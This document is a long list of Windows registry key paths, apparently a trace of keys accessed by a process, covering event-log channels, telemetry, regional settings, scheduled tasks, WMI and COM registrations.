HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ChannelAccess HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Known Folders API Service HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ChannelAccess HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eventlog\System\DCOM HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\DCOM\ProviderGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics\DFDCollectorInvokeTimes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxSessionSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxEventSizePerSession HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\AdaptiveSQM\ManifestInfo HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\SamplingInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\SQMLogger\Start HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastEventTimeStamp HKEY_USERS\.DEFAULT\Control Panel\International HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName HKEY_USERS\.DEFAULT\Control Panel\International\sCountry HKEY_USERS\.DEFAULT\Control Panel\International\sList HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal HKEY_USERS\.DEFAULT\Control Panel\International\sThousand HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime HKEY_USERS\.DEFAULT\Control Panel\International\s1159 HKEY_USERS\.DEFAULT\Control Panel\International\s2359 HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate HKEY_USERS\.DEFAULT\Control Panel\International\iCountry HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize HKEY_USERS\.DEFAULT\Control Panel\International\iDigits HKEY_USERS\.DEFAULT\Control Panel\International\iLZero HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber HKEY_USERS\.DEFAULT\Control Panel\International\NumShape HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\schtasks.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater\Id HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Customer Experience Improvement Program\Uploader HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\WDM\DREDGE HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ACPI HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\ImagePath HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NDIS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\ImagePath HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\ImagePath HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\ImagePath HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\ImagePath HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\portcls HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\MofImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\ImagePath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\advapi32.dll[MofResourceName] HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\KnownSvcs HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\WMIADAP.exe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\net.exe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\net1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\EnableFileTracing HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\FileTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\EnableConsoleTracing HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\ConsoleTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\MaxFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IpHlpSvc\FileDirectory HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\ESS HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy HKEY_LOCAL_MACHINE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PreviousServiceShutdown HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\winmgmt HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\sc.exe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\WmiPrvSE.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\WMIADAP.EXE HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RunAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateAtStorage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ROTFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppIDFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission HKEY_LOCAL_MACHINE\Software\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\SRPTrustLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\PreferredServerBitness HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LoadUserSettings HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Power\PowerRequestOverride HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\PowerRequestOverride HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerRequestOverride\Driver HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\ServerExecutable HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AppID HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalService HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\DllSurrogate HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\RunAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\ActivateAtStorage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\ROTFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AppIDFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LaunchPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\RemoteServerName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\SRPTrustLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\PreferredServerBitness HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LoadUserSettings HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\Elevation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\ActivationFailureLoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\CoInitializeSecurityParam HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\ImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\AuthenticationCapabilities HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\CoInitializeSecurityAppID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\DeferredCoInitializeSecurityServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\DefaultRpcStackSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs\SystemCritical HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceMain HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NoResyncPerf HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\ADAP HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ThrottleDrege HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ADAPDelay HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LodCtrDelay HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\TimeToFullDredge HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\TimeToTerminateAdap HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastFullDredgeTimestamp 